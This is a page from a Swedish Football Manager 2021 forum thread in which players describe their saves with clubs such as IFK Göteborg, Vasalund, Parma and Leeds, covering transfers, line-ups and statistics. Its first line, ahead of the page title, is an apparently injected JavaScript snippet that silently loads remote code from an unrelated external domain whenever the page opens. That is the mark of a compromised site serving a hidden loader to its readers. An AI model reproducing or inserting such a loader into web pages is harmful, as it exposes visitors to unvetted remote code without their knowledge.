;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Vilket lag är du? Hur går det? – Sida 14 – Football Manager 2021 – FMSweden Forum
Meny Stäng

Vilket lag är du? H...

Share:
Notifications
Clear all

Vilket lag är du? Hur går det?

324 Inlägg
79 Users
472 Reactions
22.9 K Visningar
stylish97
(@stylish97)
Active Member

Säsong två avklarad med IFK Gbg.

Fick inleda sillyn med att sälja iväg August Erlingmark till Hamburg då han blev sur för jag inte spelat honom som central mittfältare, som jag vid något svagt tillfälle tydligen lovat. Att spela samtliga matcher som dominant spelande mittback i sin moderklubb som skulle kvara till CL nästa säsong räckte tydligen inte... Nåja, vi fick ändå 30 mille för honom, och vi hade redan en del försvarare på väg in. Men lite sur på honom var jag allt. 

Från A-laget hände följande försäljningar under säsongen:

• August Erlingmark - Hamburg (30 Mkr)
  • Giannis Anestis - Spezia (8 Mkr)
  • Tobias Sana - Helsingborg (Gratis)
  • Mattias Bjärsmys - Y. Malatyaspor (Gratis)

Förutom Erlingmark kanske folk höjer på ögonbrynen åt att Sana fick gå gratis. Tyvärr så passade inte Sana in i systemet jag spelar och kostade rätt mycket i lön per månad, så när kontraktet var på väg att löpa ut så kom Helsingborg in och ville snappa upp honom. All lycka till honom, han förtjänade bättre än han fick här i slutet. Bjärsmyr var i liknande situation där han skulle fått nöta en del bänk denna säsong, så han tog chansen att hoppa på ett sista utlandsäventyr i Turkiet. Anestis vill inte heller han nöta bänk bakom Jacob Rinne, och det kan jag förstå. 8 Mkr och Spezia blev en grek rikare.

Nyförvärv blev:

• Isak Bergmann Johannesson - Norrköping (25 Mkr)
  • Jean Ruiz - Chateauroux (15 Mkr SPORTCHEFENS VAL)
  • Kalle Björklund - Hammarby (9 Mkr)
  • Viktor Edvardsen - Degerfors (3,75 Mkr)
  • Filip Örnblom - Öster (Gratis)
  • Andreas Murbeck - Landskrona (Gratis)
  • Axel Björnström - Sirius (Gratis)
  • Simon Amin - Trelleborg (Gratis)

En hel del nyförvärv fixades redan under första säsongen, men då som bosman när deras kontrakt gått ut. Jag vil helst hålla nere nyförvärven för att spela ihop laget och krydda med lite uppflyttade ungdomar, men mina saves tenderar att bli såhär mot säsong två, då en ev rustning mot CL hägrar. Johannesson var mitt förstaval länge som lekkamrat bredvid Hamsik då han dels är ung och dels förbättrar vårat lag väldigt mycket från den krävande position som mezzalan innebär. Min sportchef hittade en juvel i Frankrike i form av Jean Ruiz som jag godkände, och han har spelat nästan varje match efter det. Klassvärvning som antagligen kommer snappas upp av en storklubb längre fram. Edvardsen var en annan värvning som jag kollat länge på. Hårt jobbande anfallare som ändå hade avsluten i sig, det finns inte många i sverige med hans attribut(Selmani, men han kostade mer). Edvardsen tackade med att göra 18 mål över alla turneringar, vilket får sägas vara väl investerade pengar.

Startelvan såg allt som oftast ut enligt följande:

Mål: Jacob Rinne

MB: Jean Ruiz

MB: C. Johansson

MB: Filip Örnblom (framröstad till säsongens värvning av fansen. 7 mål av en mittback/def mitt är inte illa pinkat)

YB H: Godswill Ekpolo

YB V: Axel Björnström

Def speluppläggare: Jacob Johansson (När han var hel, skall sägas. Här kommer jag leta förstärkning till nästa säsong. Melvin Berg kan ta över till att börja med)

Mezzala: Marek Hamsik (Högst snitt, 7,44, i hela serien. 4 mål och 16(!) assist över alla turneringar. Galet bra för en 34 åring)

Mezzala: Isak Bergmann Johannesson

Anfallare: Marco da Graca (Förlängt lånet två gånger. 19 mål denna säsongen)

Anfallare: Viktor Edvardsen (Bra värde för pengarna)

För övrigt: Förra säsongens ungdomsintag innehöll bland annat Jonathan Sjöholm(bild), som kommer ta plats i anfallsuppsättningen till nästa säsong¨.

För övrigt 2: Vi lyckades kvala in till gruppspelet i CL(slog ut Qarabag i sista kvalmatchen, för er som kommer ihåg) och hamnade i en jävla rövgrupp med Man City, Real Madrid samt Zenit st Petersburg. Vi fick ändå in 7 poäng då vi slog Zenit båda mötena samt lyckades kryssa mot Real Madrid hemma. Bra cash på kontot nu, mesta av det skall plöjas ner i ungdomsverksamheten. Hörs!

The Gustine and Micke reacted
SvaraCitera
trashbag
(@trashbag)
Reputable Member Admin

CE Sabadell 2020/2021

Efter att ha skapat följande önskelista som grund för en save: https://fmsweden.se/forum/postid/5458/ så var det dags för en sparning i Spanien. Jag bestämde mig snabbt för att börja i botten av andraligan och valde mellan lagen som ligger under nedflyttningsstrecket i verkliga livet. Efter lite snabbt avstämmande mot FM så såg Sabadell ut att var det svagaste laget att börja med och därför föll valet på dom.

Efter vinterpatchen så satte jag mig ner och jämförde bra taktiker för att till slut landa i en egen. Detta ovan blev då resultatet. Lite vågat kan tyckas med bara en innermittfältare utan en defensiv bakom men det fungerar förvånansvärt bra. Visst man släpper in mycket mål men man gör också väldigt mycket mål. Taktiken är alltså testad i olika simulerade scenarion innan jag börjar använda den med Sabadell. Länk till taktiken om någon vill testa själv: https://ufile.io/6yi1kjj4

Första säsongen slutar i succé. Vi är enligt media och bookmakers det sämsta laget i ligan men lyckas göra mest mål av alla. I och med detta når vi kvalspel där Real Sporting tyvärr blir för starka i kval-semin, Sporting som sedan vinner kvalfinalen och går upp.

Bästa elvan enligt ovan. Mäktiga Gorka Guruzeta skulle ha en given plats i anfallet om det inte var för att han drog korsbandet i slutet av säsongen. Inför säsong två kommer vi tappa tre spelare från den bästa elvan. Det handlar först om Óscar Rubio vars attribut gått ner kraftigt under säsongen och då han blir 36-37 år släpps han på en fri transfer. Övriga som lämnar är Stoichkov och Álvaro Vázquez. Där har vi inget att sätta emot då detta är spelare som varit på lån och som vi inte kan förnya låneavtalet med. Glädjande är dock att tre andra lån blir kvar i klubben: mittbacken Juan Ibiza, högeryttern Juan Hernández samt användbara Víctor García som kan spela både högerback och högerytter. Avslutningsvis kan jag meddela att det är spännande spelare på väg in till Sabadell inför säsong två!

This post was modified 3 år sedan 5 times by trashbag

The Gustine reacted
SvaraCitera
(@pcch7)
Trusted Member

Började en save med Parma. Torsk mot Cagliari i premiären men sen dess har det gått fint

SvaraCitera
Peter Hecktor
(@peter-hecktor)
Ägare

Jag och min bästa polare ska dra igång ett nätverkslir och har kommit på en idé som vi tror kan bli kul.

Jag ska vara Man City, värva dom bästa och plocka in underbarn. Målet är att vinna rubbet.

Min polare ska vara i Championship och vinna titlar, alltså ta upp lag till PL. När det är gjort så avgår han och tar en ny klubb. Han ”får” inte följa med ett lag upp (om det inte är Newcastle som han gillar?)

Grejen är att vi ska samarbeta hela tiden. Jag ska låna ut underbarn till honom som gör att han tar sig uppåt och jag tjänar på att mina underbarn får speltid. Kan bli kul!

Lange95, Micke and juanele77 reacted
SvaraCitera
(@pcch7)
Trusted Member

Går mot en stark första säsong, trots brist på en riktigt anfallare

SvaraCitera
(@pcch7)
Trusted Member

Det blev en 3e plats med Parma. Gervinho spottade in 21 mål till slut men han ska bort nu. Är snart i januari på andra säsongen. Ligger delad 1a med Roma efter 15 matcher, men Juve är en poäng bakom med en match mindre spelad. Kom till slut på en andra plats i CL gruppen med Dortmund, Porto och Viktoria Plzen. Behövde ta poäng i sista matchen mot Dortmund för att va säker på avancemang, gick ju ok ? Karamoh har växlat upp och gjort 19 mål på totalt 17 matcher nu, dessutom lånat in Pedri, Sebastiano Esposito och Jamal Musiala så offensiven är lite bättre den här säsongen.

SvaraCitera
(@pcch7)
Trusted Member

Kunde inte drömt om en bättre lottning heller

Micke reacted
SvaraCitera
(@pcch7)
Trusted Member

Blev en 3e plats med Parma igen i Serie A. Tog oss till final i cupen, förlust mot Juve i förlängning. Slog Salzburg i åttondelen i CL, Rangers chockade mot Arsenal så jag hoppades på dom i kvarten. Istället blev det Liverpool och reståg utan att kunna göra ett mål. Dortmund tog hem hela skiten mot Liverpool i final, och vi spöade ju Dortmund i gruppen så det känns ju ändå fint.

Wheelat och dealat som värsta Harry Redknapp så det massa transfers & lån. Försökt kränga Cornelius och Inglese sen jag startade saven i princip för att få loss lite pengar, till slut lyckades jag i januari 2022. Men Inglese gav jag nästan bort till slut. Sålde Alex Teixeira som hade ett bra år för oss till Nice, medan han fortfarande hade ett någorlunda högt värde. 19 mål på 18 matcher av Karamoh blev för mycket för Milan att motstå så dom köpte loss han för 35m pund. Dom fick lite sämre utdelning dock.

Plockat in Ahmedhodzic, Papetti, Lovato, Christhian Mosquera, Henrichs, Jesus Vazques till försvaret.

Zaccagni, Tagseth, Jörgensen, Falco och Chaves till mittfältet, plus Pedri på lån såklart. Svårt att få loss honom tyvärr.

Esposito som jag kommer köpa, Musiala, Gabriel Veron, Carbonell till anfallet. Massa talanger utöver dessa

SvaraCitera
(@pcch7)
Trusted Member

Glömde att jag har säkrat den här guldklimpen på free transfer också. Kunde ju inte tro mina ögon när det visade sig att dom inte förlängt.

Micke reacted
SvaraCitera
(@fowara)
New Member

Är inne på 9e säsongen med Le Mans FC och vi vann precis liga för andra året i rad med 4 matcher kvar. Tog även hem Coupe de France för andra året. Jag har satsat på unga spelare med få undantag och det är nog tack vare det som vi gått så bra, att jag inte bytt ut hela laget varje år utan låter spelarna utvecklas och få en bra dynamik. Snittåldern i laget är 23 år med den yngsta som är 19 och den äldsta är 32.

Le Mans startar i Championnat National och förväntas vinna den ligan, vilket vi också gjorde för att sedan hänga kvar i Ligue 2. Vi fixade uppflyttning redan första säsongen i Ligue 2 via playoff och slutade 9a första säsongen i Ligue 1. Mellan 2022/2023 och 2026/2027 så kämpade vi med att utmana PSG vilket var omöjligt men 2027/2028 vann vi ligan och var dessutom obesegrade i ligan, 18 poäng före PSG. Nu kämpar vi vidare med att vinna Champions League.

Laget består av mest regens men några riktiga spelare som hjälpt till sen start (eller något år efter) är:

Theo (Zidanes son)
Parfait Guiagon
Asanele Velebhayi
Williot Swedberg
Fran Gomez
Goncalo Cardoso

Sen tillkom inför nuvarande säsong:
Anthony Elanga
Kiril Despodov

Jag använder mig av Increase realism megapack samt FM Expansion Packs Megapack för att få lite mer realism i spelet (inte alla filer dock men transfer, alternativ youth rating och liknande). 

SvaraCitera
Argt Troll
(@argt-troll)
Reputable Member

:: KAN VASALUND BLI STÖRST I STOCKHOLM?
VASALUNDS IF - SÄSONG 1

3 SPELARE IN 177K - 2 SPELARE UT 0K

Då var det dags för ännu en ny save. Denna gång med Stockholmsklubben Vasalunds IF, där målsättningen är att slå sig in bland de tre stora jättarna Djurgården, AIK och Hammarby i huvudstaden och bli bäst i stan. Min ambition är att från inhemsk mark bara värva spelare som är födda i Stockholms Län eller som blivit ratade av någon av de tre just nämnda. Varenda regen som kommer fram från någon av alla 08-klubbar ska vi ha koll på och försöka sno åt oss innan större klubbar nappar. Utifrån Sveriges gränser kommer jag försöka att få in en hel del afrikaner, likt klubben gjort i verkligheten, men även andra importer från lite mer udda länder.

Den första säsongen kan enkelt beskrivas som en berg-och-dalbana utan någon som helst rim och reson. Antingen spelade vi på en hög superetta-nivå där vi inkasserade ett flertal segrar efter varandra, eller så var det det motsatta. Som ni kan se i tabellen vittnar våra tre kryss om detta. Men som en nederlagstippad nykomling får åttondeplatsen i Superettan ses som en stor framgång. In till klubben har vi i alla fall säkrat tre talanger där två kommer från Södertäljeklubben Assyriska och den sistnämnda från färöiska ligan. Jag både tror och hoppas på att Yakoub och Kallsberg kan utvecklas till allsvenska stjärnor i framtiden. 

Nu väntar en vinter full av scouting. Nya regens har kommit fram i Stockholm och dessutom ska jag lämna vinterkylan för Afrika där jag förhoppningsvis kommer hem med några diamanter. Enda problemet är ekonomin som inte tillåter några övergångssummor. Vi har i skrivande stund direkt efter säsongen -2 miljoner i saldo.

FÖR ÖVRIGT...
...
drog stjärnspelaren Kebba Ceesay korsbandet under sommaren och avslutade karriären.
...fick vi fram ett flertal lovande talanger där Sebastian Pettersson anses vara den mest lovande.
...
jagas nyförvärvet Kallsberg av halva Allsvenskan.

Micke reacted
SvaraCitera
Hypno
(@hypno)
Eminent Member
Topic starter  

Började min karriär som tränare för IFK Norrköping. Efter en väldigt lyckad tid där blev det ett par år i franska Lille innan jag tog över min tredje - och sista - post som Tottenhams tränare. År 2030 har jag nu vunnit Champions League, vilket var det simpla målet med saven. Därav är det dags för ny save, denna gång ska jag börja betydligt längre ned i divisionerna (och inte i Sverige). 

Efter mig lämnar jag ett Tottenham som hade skrattat åt Galacticos. Det är ett nästan patetiskt starkt lag jag köpt ihop (mestadels). Bara under fjolåret värvade vi spelare för 5,7 miljarder kronor - sålde för 3 - och därmed känner jag mig inte direkt som en demontränare för att ha vunnit CL och PL när jag även förfogar över världens bästa lag. Den största bedriften i saven var nog snarare att jag som Lille-tränare vann ligan under mitt första år där, 2023/24, trots en på pappret sämre trupp än såväl PSG som Monaco och Lyon.

Ett axplock av Tottenhams nyckelspelare, där vi egentligen har 15-16 spelare som hade platsat i alla andra startelvor i världen (öppna i ny flik för större bilder):

Spoiler
Screens

SvaraCitera
Jimpacool
(@jimpacool)
Eminent Member

Efter en tid av snabbt avslutade saves med diverse lag där jag aldrig riktigt fastnade, så startade jag upp med FC Midtjylland i danska ligan. 
Tanken är väl som det nästan ständigt är - köpa ungt och billigt, för att sedan utveckla och sälja vidare. 

Första säsongen är nu klar och det blev vinst i ligan, där allt avgjordes i sista matchen. 
Vi åkte ut tidigt i cupen (en turnering vi spelade med endast ungdomsspelare i) samt tog oss till Champions league. Där hamnade vi i en grupp med Lazio, Dortmund & Liverpool och vi slutade överraskande nog på en stabil andraplats. I nästa omgång så åkte vi sedan ut mot Juventus dock. 

Spelare som plockades in var;
Brian Brobbey från Ajax,
Max Norrman Wiliamsen från Norska ligan, samt
Matias Arezo och Sivert Mannsverk som kom till oss under vinteruppehållet. 

Spelar för första gången i min fm-karriär med något annat än en fyrbackslinje, då vi varierar mellan 3/5-backslinje beroende på motstånd. 

Argt Troll and Micke reacted
SvaraCitera
Argt Troll
(@argt-troll)
Reputable Member

:: KAN VASALUND BLI STÖRST I STOCKHOLM?
VASALUNDS IF - SÄSONG 2

9 SPELARE IN 235K - 2 SPELARE UT 6 MILJ

Som jag gav sken av så skulle det bli en vinter full av scouting, där den enda farhågan var vår ekonomi som inte gav utrymme för några större investeringar. Lyckligtvis fann jag ett helt gäng med billiga kap, där Lalawele Atakora (fd AIK), Oscar Pettersson (fd Djurgården) och Peter McGregor (fd. Djurgården) var de mest namnkunniga. Utöver denna trio värvades en senegales, tanzanier och fyra spelare från mindre klubbar i Stockholm. Ut lämnade vår moldaviska målvakt Radu och Poul Kallsberg. Det blev bara en säsong för den sistnämnda färöingen som nu ska pröva på lyckan nere i Skåne och Malmö FF.

Det visade sig ta ett tag för laget att spela ihop sig. Efter tolv omgångar låg vi på en negativ kvalplats, men kunde under hösten avancera rätt rejält och landar tillslut på en femteplats. Anledningen var främst ett taktiskt skifte där vi numera spelar en offensiv 433-fotboll med en sittande mittfältare som gav laget mer balans jämfört med vår tidigare 4222-taktik som ofta kunde betraktas som High Chaparral. Om vi kan bygga vidare på detta är jag övertygad om att vi slåss om uppflyttning under den kommande säsongen.

För att vi ska kunna vara med och tampas om en uppflyttning säsongen 2023 så lär inte vintern handla om att leta förstärkningar utan snarare att behålla befintlig trupp. Vi har ett gäng spelare med intresse på sig från allsvenska klubbar och jag kommer troligtvis få jobba hårt med vissa övertalningsprocesser. Men det blir i alla fall en liten scoutingtripp till Afrika även i år. Förhoppningsvis vänder jag inte hem till Solna lottlös.

FÖR ÖVRIGT...
...var vår bästa spelare under säsongen Amer Bergman. Blott 17 år fylld.
...
så lägger vår omskolade mezzala Denni Avdic nu skorna på hyllan. 

Jimpacool reacted
SvaraCitera
trashbag
(@trashbag)
Reputable Member Admin

Jag skrev upp lite statistik för min säsong med Envigado FC i Colombianska högstaligan. Det är statistik från mina tävlingsmatcher säsong 2. Gjorde det mest för skoj, vet inte vad jag ska göra mer med det än att tänka högt här lite.

xG för laget
------------
27 av 33 vinster har jag bättre xG än motståndaren (82%) - borde vara nära 100%
21 av 28 oavgjorda har jag bättre xG än motståndaren (75%) - borde vara nära 50%
8 av 15 förluster har jag bättre xG än motståndaren (53%) - borde vara nära 0%

83,37 förväntade mål i ligan men blev 94 mål (1,13 gånger xG)
47,78 förväntade mål mot i ligan men blev 55 mål mot (1,15 gånger xGa)

Vet inte vad jag ska säga här mer än att frustrationen när man sliter sig i håret för man tycker man spelat bättre än motståndaren men inte fått det resultatet matchmotorn visar kan stämma ganska bra. FM bjuder mig på glädjesiffror sett till xG jämfört med motståndaren i matcherna. Att jag har bättre xG i tre av fyra oavgjorda matcher samt i hälften av matcherna jag förlorar är som sagt frustrerande men vet inte vad man kan göra åt det.

Gällande xG och xGa generellt sett till ligasäsongen ser det dock ganska konsekvent ut då jag ligger lite i överkant gällande mål gjorda och insläppta kontra xG och xGa.

xG för mest spelade anfallare i mitt lag
----------------------------------------
Anfallare 1: 26 mål på 20,44 xG (1,27 gånger xG)
Anfallare 2: 8 mål på 8,82 xg (0,91 gånger xG)
Anfallare 3: 17 mål på 13,31 xG (1,28 gånger xG)
Anfallare 4: 13 mål på 9,74 xG (1,33 gånger xG)
Anfallare 5: 10 mål på 6,38 xG (1,57 gånger xG)

Under första delen av säsongen spelade anfallare ett och två mycket medan anfallare fem var backup. Anfallare fem presterade ju betydligt bättre och vi hade mycket lättare att vinna då han spelade istället för anfallare två men på grund av ålder/potential ville jag inte spela in anfallare fem för mycket.

Lösningen blev att anfallare fyra lånades in samtidigt som anfallare tre hade utvecklats så mycket under säsongen. Dessa blev startspelare under hösten och då kunde flera matcher utvecklas till vinster istället för att bara bli oavgjort.

Lärdomen jag dragit gällande anfallarna är väl att anfallaren bör göra fler mål än sitt xG, helst minst 1,25 gånger förväntad xG för att man ska få den där sista lilla spetsen som förvandlar oavgjorda matcher till vinster.

Hur det gick tävlingsmässigt säsong 2?
Finalförlust i öppningsomgången av ligan mot Independiente Santa Fe
3.a i gruppspelet av Copa Libertadores
Kvartsfinalförlust i Copa Sudamericana mot São Paulo
Vinnare i stängningsomgången av ligan mot Atlético Nacional

This post was modified 3 år sedan by trashbag

SvaraCitera
Argt Troll
(@argt-troll)
Reputable Member

:: KAN VASALUND BLI STÖRST I STOCKHOLM?
VASALUNDS IF - SÄSONG 3

6 SPELARE IN - 2 SPELARE UT | +1 MILJ

Det anslöt sex spelare till laget inför och under säsongen, där tre utav dem hade ett förflutet i Djurgårdens organisation och där den andra trion anslöt direkt från Afrika. Ut från klubben lämnade Christian Aphrem för 1.4 miljoner. Sköna pengar för en spelare som hade fått begränsat med speltid under säsongen. Nu var vi redo för Superettan anno 2023.

Som vi rivstartade den. Inte förs i den tolfte omgången fick vi se oss besegrade för första gången. Dessförinnan hade vi visat upp en notabel stabilitet med sju nollor bakåt och en blomstrande offensiv. Så skulle det även hålla i sig säsongen ut och när trettio omgångar var spelade så hade vi gjort såväl flest som släppt in minst mål av alla lagen i Superettan. Trots detta tog ÖIS två poäng fler än oss, men vad gör det? Vi tar nämligen andraplatsen vilket betyder avancemang till Allsvenskan! En sanslöst skön bedrift som även är en stor milstolpe för Vasalunds IF som nu för första gången ska pröva på lyckan i Sveriges finrum.

För första gången under savens gång väntar jag mig ett lugnt och skönt vinterfönster. Manskapet som spelat upp oss i Allsvenskan ska i alla fall få en ärlig chans att visa vad de går för fram tills sommarfönstret. Målsättningen här och nu kan inte vara någon annan än att kriga för ett nytt kontrakt. 

FÖR ÖVRIGT...
...har tre stycken "gråa" 15-åringar lämnat för ligakonkurrenter under hösten. Blir spännande och se vad vi gått miste om under nästa upplaga av ungdomskandidater.
...har vårt ghananska nyförvärv Francis Mintah fått en kometliknande utveckling under säsongen och bör nog snart vara redo för större ligor.

Micke and LeoFM reacted
SvaraCitera
Micke
(@micke)
Reputable Member Admin

@argt-troll Imponerande, grattis till uppflyttning och lycka till i Allsvenskan!

"I have never played for a draw in my life." - Sir Alex Ferguson

SvaraCitera
(@velez)
New Member

Leeds United!

Säsong 1

Placering Ligan: 4:plats kvalicifierad för Champions League

utslagen tidigt i cuperna.

Nyförvärv
Anel Ahmedhodžić - Malmö FF

Gaston Ramirez - Sampdoria

Thiago Almada - Velez  köptes under Vinterfönstret

försäljningar

Patrick Bamford  såldes under vinterfönstret

Säsongen börjar lite halvskakigt med en väldigt defensiv spelsystem, som visserligen höll siffrorna nere men dock hade vi väldigt svårt att göra mål, vilket kan ses som logiskt.

Jag satsade efter ett tag på en mer offensiv uppstälning även om den fortfarande var defensivt lagd och spelet blev betydligt stabilare och vi började vinna matcherna och faktiskt göra mål. Vintern kom och spelarna hade vant sig vid spelsystemet och Bamford såldes då jag valde att fokusera på Rodrigo och Gaston som backup anfallare om olyckan skulle vara framme (Gaston var annars en av mina kantspelare som roterade med Raphinha) och även köpte in Thiago Almada från Velez. Andra halvan av säsongen tog offensiven fart med Almada som OMC bakom Rodrigo (som senare skadade sig och blev borta större delen av våren) medans Raphinha och Helder Costa occuperade kanterna, där Gaston och Jack Harrison var backups/rotations.
mittfältet var mestadels Kalvin Phillips ( min favorit och nyckelspelare i Leeds) och Mateusz Klich som styrt spelet alldeles utmärkt. Försvaret har varit stabilt med Liam Cooper och Anel Ahmedhodžić som nyckelkuggarna i mitten och Diego LIorente som backup Kanterna har flankerats av Dallas och Alioski med Ayling som rotation. I målet får jag nog säga att den enskilt viktigaste spelaren tillsammans med Kalvin finns i Illan Meslier som i många matcher agerade rena rama muren. med Kiko Casilla som backup.

första säsongen avslutades med en avgörande match på Emirates mot Arsenal som avgjorde hurvida mitt Leeds eller Arsenal skulle knipa fjärdeplatsen, Vinst så skulle vi bli 4a oavgjort eller förlust så skulle Arsenal bli det, en match som slutar 2 - 1 till Leeds efter att vi gått upp i en 2 måls ledning tidigt i matchen.

Årets unga spelare i PL: Illan Meslier

Leeds Bästa Målskytt: Rodrigo 15 mål (borta nästan hela våren)

Fotnot från Säsong 1:

Tottenham åkte nästan ur, man klarade sig kvar med minsta möjliga marginal efter att hela säsongen legat näst sist.

Säsong 2

Nuvarande placering i PL: 1:a

Caraboa cup: Utslagen mot Watford

Champions League: Vidare från Gruppen efter 4 spelade matcher 3 Vinster 1 oavgjord Gruppen består av FC Bayern, Atletico Madrid och Ajax. där jag Vann Borta mot FC Bayern med 2 - 1 och Ajax hemma med 3 - 2 Atl Madrid med 1 - 0 och sen borta mot Atl Madrid slutade 1 - 1.

Nyförvärv

Rodlofo Pizzaro - Inter Miami

Ezequiel Barco - Atlanta United

Nicolas Dominguez - Bologna

Thilo Kehrer - PSG

Rodrigo De Paul - Udinese

Jack Harrison - Manchester City (köpte loss han från Manchester City)

Cameron Carter-Vickers - Tottenham Hotspurs

Försäljningar

Gaston Ramirez - PAOK

Diego LIorente - Valencia

Robin Koch - Bayern Leverkusen.

Andra Säsongen börjar bra men när jag ska möta Watford i Caraboa Cup så tar det stop vi gör en bra match på bortaplan mot Watford som i matchen innan Spöade Chelsea på Stamford Bridge matchen står och väger om än inte målmässigt då vi ligger under med 3 - 1 med 20 min kvar då jag byter in Mr Rodrigo som behöver 10 min för att klämma in 2 mål så matchen slutar 3 - 3 och går till Straffar där jag sätter min bästa straffskytt som siste skytt. alla straffskyttar gör mål, tills det är Rodrigo De Pauls tur, men han missar.

Men ligaspelet går som på räls, försvaret är starkare än kinamuren och har på 12 matcher bara släppt in 1 mål och då har jag ändån mött Manchester City, Liverpool (Hemmaplan) och Tottenham (Bortaplan). 

Men inför vinterfönstret så försvinner Alioski då han varit missnöjd över att jag inte spelar han på hans önskade placering utan som vänsterback. så måste fixa en ersättare utan han så har jag bara Ayling och Dallas på kanterna och ingen backup.

SvaraCitera
Vilmer1238
(@vilmer1238)
Active Member

Fc Flora - Bäst av dem sämsta 

Jag har på min fm save valt att spela med FC Flora, en klubb från Estland huvudstad Tallinn. 

Estlands högstaliga är inte känd för något, absolut ingenting. Ligan är rankad som den tredje sämste ligan i europa. 

Mitt mål är att ändra på det!

--------------------------------------------------------------------------------------------------------------------------

Säsong 1 

In ->   Deniz Yaldir (Umeå FC)

Zurab ochigava (Sabah FK)

Joël Yeregbe (SOO Armé)

ut -> Herol Riiberg (Tallinna Kalev)

Säsongen börade väldigt bra och vi var favoriter och visade att vi förtjänade att vara det. Vi var obesgrade fram till den 17 omgången då vi tog emot våra derbyrivaler FCI Levadia på hemmaplan och förlorar matchen pågrund av en straff som dem tar vara på och våra strikers inte är tillräckligt kliniska för att få en kvittering.

Vi var också i ett champions League kval där vi ska gå in i den första omgången där vi får svåraste lottningen möjlig, Celtic. Pågrund av att detta var ett coronaår så var det endast enkelmöten i kvalet.

Vi blev lottade att få spela matchen på hemmaplan dock hjälpte inte den fördelen och vi förlorade matchen med 2-0 och blev fördömda att få fortsätta kvalet i Europa league.

I Europa League så blev vi lottade att möta FC Riga där vi på bortaplan vann med 3-0 mot Riga och var vidare i den tredje kvalomgången där vi skulle möta Vllanznia på bortaplan. Dock blev dem förstora för oss och vårat europa spel var slut för denna gång.

I ligan gick vi dock bra och vann Meeistirliga och blev kvlaificerade för Europakval även nästa säsong.

FC Flora 29 V 5 O 2 F

Mest spelade startelva

Liivak

Yaldir            Sappinen         Alliku

Miller            Vassiljev (K)

Kallaste          Kuusk          Jääger           Lilander

Igonen

SvaraCitera
trashbag
(@trashbag)
Reputable Member Admin

Ny save på gång där jag ska försöka vinna högstaligan i alla centraleuropeiska länder (av dom som finns i originalspelet). Börjar i Österrikes andradivision och laget SV Horn. Tog ett snäpp sämre i utbildning och erfarenhet på tränaren än vad som rekommenderas för laget. Här är ligorna som är laddade:

Laget som valdes blev som sagt SV Horn. Tog helt enkelt det laget som var mediatippat sist av dom lag som inte var rödvita (vet inte varför men jag har svårt att spela med rödvita lag...). Förväntningarna från styrelsen var att vi skulle undvika nedflyttning.

Det gick bra mycket bättre än så. Efter första halvan av säsongen låg vi på 7:e plats och vi förlorade tre av dom första fyra matcherna på vårsäsongen. Men efter en riktigt stark avslutning där vi vinner sju av dom avslutande nio ligamatcherna slutar vi på 3:e plats. Styrelsens mål är att vi nästa säsong ska ta en mittenplacering.

Säsongens bästa elva. Många unga spelare och dom yngsta är 03:orna Lucho och Daniel Owusu. Dom två och målvakten Daniel Antosch (00:a) är alla tre inlånade av Red Bull Salzburg och vi hoppas att vi kan förnya lånen samt på sikt kanske skriva permanenta avtal med dessa lovande spelare. Vår slovenska anfallare Patrik Eler vinner skytteligan i ligan med sina 16 ligamål på 29 ligamatcher.
This post was modified 3 år sedan 11 times by trashbag

Nunogomes reacted
SvaraCitera
Sida 14 / 17
Share: